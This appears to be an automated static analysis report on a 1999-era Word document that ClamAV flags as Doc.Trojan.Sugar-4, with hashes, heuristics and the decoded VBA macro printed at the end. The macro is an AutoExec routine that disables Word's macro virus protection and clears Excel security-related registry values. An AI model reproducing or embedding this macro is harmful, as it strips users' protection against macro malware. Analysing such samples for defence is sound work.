Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5aff15e9a662d5c…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 1999-01-01 14:29:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 7a7ac098a932323f61342519e0e93262
SHA-1: 8c38846bd2e70f7fefe757a9bed5fd25b60d9c7d
SHA-256: c5aff15e9a662d5ce27e2995061f06fa8b6deb954145bc3833b8ad39b7aa4ab1
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Sugar-4. It contains a VBA AutoExec subroutine which, when run, sets the Word option EnableMacroVirusProtection to "0" (disabling macro virus protection) and clears the Options6 value under both the HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE Excel 8.0 settings keys via System.PrivateProfileString. Explicitly targeting these registry keys suggests an intent to prepare the system for subsequent malicious actions or to evade detection.

Heuristics (2)

  • ClamAV: Doc.Trojan.Sugar-4 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Sugar-4
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 632 bytes
SHA-256: 37c7478d3f552eafe278b11d9624d70011ff7d7f8c020396ea99b9b8866bcbf4
Detection
ClamAV: Doc.Trojan.Sugar-4
Obfuscation or payload: unlikely
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoExec() 'Vic
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
End Sub